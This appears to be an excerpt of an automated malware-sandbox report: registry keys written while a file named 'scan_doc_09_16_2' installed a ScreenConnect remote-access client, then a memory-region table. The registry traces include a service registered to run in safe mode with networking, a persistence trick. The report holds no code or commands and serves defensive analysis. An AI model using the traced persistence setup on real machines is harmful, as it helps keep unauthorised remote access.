HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsBackstageShell.exe.config_bc78256f1e952942
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsFileManager.exe_74b82db4db38179e
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\Files
ScreenConnect.Windows.dll_fa5f7fd8f7c108bb
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Files
ScreenConnect.ClientService.dll_5e8c1e5c1cd8d9ee
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files
ScreenConnect.WindowsClient.exe_fd0fcfe1fd1a6cd2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\Files
ScreenConnect.Core.dll_963930cc5ced28c7
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Files
ScreenConnect.Client.dll_7b0ea606092ddbcb
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
SubstructureCreated
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
ProgramId
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
FileId
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
LowerCaseLongPath
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
LongPathHash
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
Name
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
OriginalFileName
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
Publisher
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
Version
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
BinFileVersion
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
BinaryType
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
ProductName
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
ProductVersion
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
LinkDate
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
BinProductVersion
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
AppxPackageFullName
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
AppxPackageRelativeId
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
Size
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
Language
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\B68D8F953E551914324E557E6164D68B9926650C
Blob
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02vnquskfpppcivc
Reason
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qnlaiyfkqjflos
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02qnlaiyfkqjflos
Provision Wednesday, October 02, 2024 00:23:00
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qnlaiyfkqjflos
AppIdList
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02gfcilbgfbgtour
Request Wednesday, October 02, 2024 00:23:04
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02gfcilbgfbgtour
Response Wednesday, October 02, 2024 00:23:04
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02gfcilbgfbgtour
Reason
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02vnyqymuixxsanc
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02vnyqymuixxsanc
AppIdList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02vnquskfpppcivc
AppIdList
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
ValidDeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL
GlobalDeviceUpdateTime
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qnlaiyfkqjflos
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
ValidDeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qnlaiyfkqjflos
DeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qnlaiyfkqjflos
DeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
ValidDeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02gfcilbgfbgtour
AppIdList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02vnyqymuixxsanc
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
ValidDeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02vnyqymuixxsanc
DeviceId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\ExtendedProperties
LID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02vnyqymuixxsanc
DeviceId
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
lock!0e000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
lock!0c000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
lock!0a000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
lock!08000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
lock!06000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
lock!04000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
lock!02000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
lock!1c000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
lock!1a000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
lock!18000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
lock!16000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
lock!14000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
lock!12000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
lock!10000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
lock!1d000000e7916100f01d0000f41d00000000000000000000666a25cc8214db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_188970e3844df7b6
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_d0aeae01f8c2b957
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
HasRunBefore
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (73549b67-726b-470e-ab1a-fbbb83a6a15b)
NULL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (73549b67-726b-470e-ab1a-fbbb83a6a15b)
ImagePath
There are 215 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FF8491A4000
trusted library allocation
page read and write
1A7287E000
stack
page read and write
7FF849000000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
22721C38000
heap
page read and write
1C5CAC02000
unkown
page read and write
227219AD000
heap
page read and write
132F1000
trusted library allocation
page read and write
247E000
stack
page read and write
22264A97000
heap
page read and write
22264AD2000
heap
page read and write
7FF8492D0000
trusted library allocation
page read and write
1E585061000
heap
page read and write
482A000
stack
page read and write
1780000
trusted library allocation
page read and write
7FF8490C5000
trusted library allocation
page read and write
37C0000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page execute and read and write
7FF849070000
trusted library allocation
page read and write
3E4F000
stack
page read and write
1B956000
stack
page read and write
1E57F8FE000
heap
page read and write
1404AF30000
heap
page read and write
22265333000
heap
page read and write
1E57F7B0000
heap
page read and write
85851F9000
stack
page read and write
22707F10000
trusted library allocation
page read and write
750000
trusted library allocation
page read and write
1E57F8A2000
heap
page read and write
22707F58000
trusted library allocation
page read and write
1E57F902000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
B52000
trusted library allocation
page read and write
7FF848F9C000
trusted library allocation
page read and write
CC0000
heap
page read and write
668BDFE000
unkown
page readonly
3133000
heap
page execute and read and write
1B2D0000
heap
page read and write
1BF45000
heap
page read and write
8583EFE000
unkown
page readonly
1E5850F1000
heap
page read and write
7FF849190000
trusted library allocation
page read and write
2541000
trusted library allocation
page read and write
7FF848FC7000
trusted library allocation
page read and write
22721C1F000
heap
page read and write
22707F5C000
trusted library allocation
page read and write
22264B3C000
heap
page read and write
32FF000
trusted library allocation
page read and write
8584CFE000
unkown
page readonly
227207A3000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
5F0000
heap
page read and write
22705F5B000
heap
page read and write
FF0000
unkown
page readonly
22265375000
heap
page read and write
7FF8490A1000
trusted library allocation
page read and write
22707F50000
trusted library allocation
page read and write
8583AFE000
unkown
page readonly
AAA6B5D000
stack
page read and write
1582000
trusted library allocation
page read and write
1E5850BC000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
22264B02000
heap
page read and write
17A0000
trusted library allocation
page read and write
858467E000
stack
page read and write
1E580740000
trusted library section
page readonly
22707F9D000
trusted library allocation
page read and write
22265332000
heap
page read and write
13FF000
stack
page read and write
9ED000
trusted library allocation
page execute and read and write
22265AD4000
heap
page read and write
12EE000
heap
page read and write
585DCFC000
stack
page read and write
227240A4000
heap
page read and write
1BC91000
heap
page read and write
496D000
stack
page read and write
1E5850C1000
heap
page read and write
3FDF000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
22721BB1000
heap
page read and write
3713000
trusted library allocation
page read and write
85849FE000
unkown
page readonly
7FF8490E0000
trusted library allocation
page read and write
7FF849192000
trusted library allocation
page read and write
22265393000
heap
page read and write
22265B2B000
heap
page read and write
1E584DA4000
trusted library allocation
page read and write
22265B2C000
heap
page read and write
831000
unkown
page execute read
22707FCC000
trusted library allocation
page read and write
7FF848ED0000
trusted library allocation
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
22717E4B000
trusted library allocation
page read and write
1C5CAC1B000
unkown
page read and write
3F8E000
stack
page read and write
1B170000
heap
page read and write
22707B70000
heap
page execute and read and write
2226537E000
heap
page read and write
227082D0000
trusted library allocation
page read and write
B15000
trusted library allocation
page execute and read and write
1E580640000
trusted library allocation
page read and write
8583FFB000
stack
page read and write
173E000
stack
page read and write
9D4000
trusted library allocation
page read and write
22720760000
heap
page read and write
858587E000
stack
page read and write
22265A8C000
heap
page read and write
B40000
trusted library allocation
page read and write
22721C0A000
heap
page read and write
2490000
trusted library allocation
page read and write
7FF848FB8000
trusted library allocation
page read and write
85847FE000
unkown
page readonly
7FF8492F0000
trusted library allocation
page read and write
11F1000
trusted library allocation
page read and write
1E5850ED000
heap
page read and write
22717FB7000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
281A000
trusted library allocation
page read and write
1200000
heap
page read and write
1C5CAC2B000
heap
page read and write
7FF849005000
trusted library allocation
page read and write
22264A7D000
heap
page read and write
7FF848FA7000
trusted library allocation
page read and write
A00000
heap
page read and write
22265ABB000
heap
page read and write
7FF848EB0000
trusted library allocation
page execute and read and write
1BBD7000
heap
page read and write
22265AB8000
heap
page read and write
8584FFE000
stack
page read and write
1635000
heap
page read and write
22265377000
heap
page read and write
B30000
trusted library allocation
page read and write
22264A47000
heap
page read and write
227062C5000
heap
page read and write
227060A0000
trusted library allocation
page read and write
585DEFE000
stack
page read and write
22264AFF000
heap
page read and write
1840000
heap
page read and write
22265B1B000
heap
page read and write
22265374000
heap
page read and write
2226535D000
heap
page read and write
22265329000
heap
page read and write
22721B4E000
heap
page read and write
22721B3E000
heap
page read and write
740000
heap
page read and write
705000
heap
page read and write
227062C0000
heap
page read and write
22265AAE000
heap
page read and write
2271FC60000
trusted library allocation
page read and write
14C3000
heap
page read and write
22723FA0000
heap
page read and write
22265380000
heap
page read and write
1E584E30000
trusted library allocation
page read and write
2226537A000
heap
page read and write
22265A61000
heap
page read and write
7FC000
heap
page read and write
1BDDD000
heap
page read and write
1243F000
trusted library allocation
page read and write
7FF849170000
trusted library allocation
page read and write
22265354000
heap
page read and write
22265352000
heap
page read and write
843000
unkown
page readonly
24D4000
unkown
page readonly
668B47B000
stack
page read and write
1E580CA1000
trusted library allocation
page read and write
1BC1C000
heap
page read and write
22708180000
trusted library allocation
page read and write
22720588000
heap
page read and write
22265B3C000
heap
page read and write
BCD000
unkown
page readonly
1C3BE000
stack
page read and write
22265391000
heap
page read and write
85852FE000
unkown
page readonly
5E0000
heap
page read and write
506D000
stack
page read and write
7FF8490D0000
trusted library allocation
page read and write
3D0F000
stack
page read and write
22707F43000
trusted library allocation
page read and write
7FF848FF0000
trusted library allocation
page read and write
7FF849194000
trusted library allocation
page read and write
1C5CAC00000
unkown
page read and write
2E20000
heap
page read and write
1220000
heap
page read and write
22705F84000
heap
page read and write
3270000
unkown
page readonly
7FF848FA0000
trusted library allocation
page read and write
580000
heap
page read and write
1E580002000
heap
page read and write
BA0000
trusted library allocation
page execute and read and write
22264A8F000
heap
page read and write
1C0C0000
heap
page execute and read and write
8B0000
heap
page read and write
1E5850D5000
heap
page read and write
381000
stack
page read and write
BD4000
unkown
page read and write
22265AA4000
heap
page read and write
1845000
heap
page read and write
22264B3B000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
2500000
trusted library allocation
page read and write
B47000
trusted library allocation
page read and write
7FF849230000
trusted library allocation
page read and write
129F000
trusted library allocation
page read and write
2530000
heap
page read and write
586000
heap
page read and write
2666000
trusted library allocation
page read and write
22265AD1000
heap
page read and write
22708101000
trusted library allocation
page read and write
710000
heap
page read and write
22707CED000
trusted library allocation
page read and write
12400000
trusted library allocation
page read and write
2272408C000
heap
page read and write
1E584D50000
trusted library allocation
page read and write
1852000
unkown
page readonly
22721B95000
heap
page read and write
7FF848DF0000
trusted library allocation
page read and write
668C0FB000
stack
page read and write
1E584D40000
trusted library allocation
page read and write
1404B043000
heap
page read and write
600000
heap
page read and write
3E0000
heap
page read and write
22265200000
heap
page read and write
33CE000
stack
page read and write
585D19E000
stack
page read and write
227082E0000
trusted library allocation
page read and write
1E584EA0000
trusted library allocation
page read and write
22707C10000
trusted library section
page readonly
7FF849140000
trusted library allocation
page read and write
22265ACB000
heap
page read and write
22265332000
heap
page read and write
4BEE000
stack
page read and write
7FF848E14000
trusted library allocation
page read and write
1BC23000
heap
page read and write
227081BA000
trusted library allocation
page read and write
7FF849210000
trusted library allocation
page execute and read and write
1E580770000
trusted library section
page readonly
7E2000
heap
page read and write
139B000
trusted library allocation
page read and write
1B0C0000
heap
page execute and read and write
1430000
heap
page read and write
22265ADA000
heap
page read and write
22265AC3000
heap
page read and write
22707CE7000
trusted library allocation
page read and write
1B2D5000
heap
page read and write
858497E000
stack
page read and write
1E58011A000
heap
page read and write
22265215000
heap
page read and write
7FF848FC7000
trusted library allocation
page read and write
AAA72F9000
stack
page read and write
1C5CB002000
heap
page read and write
1C5CAC78000
heap
page read and write
22264A99000
heap
page read and write
22264B1A000
heap
page read and write
1240000
heap
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
1BC8C000
heap
page read and write
3A20000
unkown
page readonly
22264B3C000
heap
page read and write
22721CEF000
heap
page read and write
3781000
trusted library allocation
page read and write
4E30000
heap
page read and write
1E584DD3000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page read and write
143C000
trusted library allocation
page read and write
4020000
trusted library allocation
page execute and read and write
1E584DA0000
trusted library allocation
page read and write
1586000
trusted library allocation
page read and write
22265357000
heap
page read and write
22265A79000
heap
page read and write
22705F3D000
heap
page read and write
22265AD1000
heap
page read and write
22720780000
heap
page read and write
1E57F895000
heap
page read and write
227204B0000
heap
page read and write
1E584CD0000
trusted library allocation
page read and write
7FF848E40000
trusted library allocation
page read and write
2226535B000
heap
page read and write
22265356000
heap
page read and write
91F000
stack
page read and write
22721C65000
heap
page read and write
22265354000
heap
page read and write
12B9000
heap
page read and write
7FF848E1B000
trusted library allocation
page execute and read and write
22265ABF000
heap
page read and write
7FF848FCD000
trusted library allocation
page read and write
7FF849093000
trusted library allocation
page read and write
6A8000
heap
page read and write
22721BB8000
heap
page read and write
22265B1B000
heap
page read and write
22705FBF000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
227082CC000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
227081F6000
trusted library allocation
page read and write
1590000
heap
page read and write
227204B9000
heap
page read and write
1E580780000
trusted library section
page readonly
13311000
trusted library allocation
page read and write
1BAAF000
stack
page read and write
B06000
trusted library allocation
page execute and read and write
23F1000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
22705F43000
heap
page read and write
52BD000
stack
page read and write
7FF8490E0000
trusted library allocation
page read and write
B17000
trusted library allocation
page execute and read and write
130E000
heap
page read and write
1E585110000
heap
page read and write
22265AB8000
heap
page read and write
2270845D000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
1404B000000
heap
page read and write
D5C000
heap
page read and write
890000
heap
page read and write
22717D8F000
trusted library allocation
page read and write
7FF849000000
trusted library allocation
page read and write
3FD0000
trusted library allocation
page read and write
22265ACF000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
831000
unkown
page execute read
222E000
trusted library allocation
page read and write
22720755000
heap
page read and write
AC0000
heap
page execute and read and write
7FF848F90000
trusted library allocation
page read and write
1B2A0000
trusted library section
page read and write
1E584D80000
trusted library allocation
page read and write
1E57F800000
heap
page read and write
227078E1000
heap
page read and write
7FF8491C0000
trusted library allocation
page read and write
9DD000
trusted library allocation
page execute and read and write
B3D000
trusted library allocation
page execute and read and write
7FF848E2D000
trusted library allocation
page execute and read and write
1C5CB013000
heap
page read and write
22264B3C000
heap
page read and write
85846FE000
unkown
page readonly
1C310000
unkown
page readonly
56A0000
heap
page read and write
2226535A000
heap
page read and write
7FF848E3A000
trusted library allocation
page read and write
22722062000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
7FF848FF0000
trusted library allocation
page execute and read and write
8584EFE000
unkown
page readonly
14EB000
heap
page read and write
1BDD0000
heap
page read and write
24F0000
trusted library allocation
page read and write
22264B1B000
heap
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
22264AAD000
heap
page read and write
1A72A7E000
stack
page read and write
7FF849210000
trusted library allocation
page read and write
22721B55000
heap
page read and write
AD0000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
1B1F5000
heap
page read and write
22264B3C000
heap
page read and write
7FF848E6C000
trusted library allocation
page execute and read and write
237E000
stack
page read and write
578000
stack
page read and write
2390000
heap
page execute and read and write
B0A000
trusted library allocation
page execute and read and write
AAA6F7E000
stack
page read and write
1BC86000
heap
page read and write
1E58510E000
heap
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
B65000
trusted library allocation
page execute and read and write
22264B3F000
heap
page read and write
2513000
trusted library allocation
page read and write
2480000
trusted library allocation
page execute and read and write
7FF848F10000
trusted library allocation
page execute and read and write
1AD40000
heap
page read and write
132FC000
trusted library allocation
page read and write
3C0E000
stack
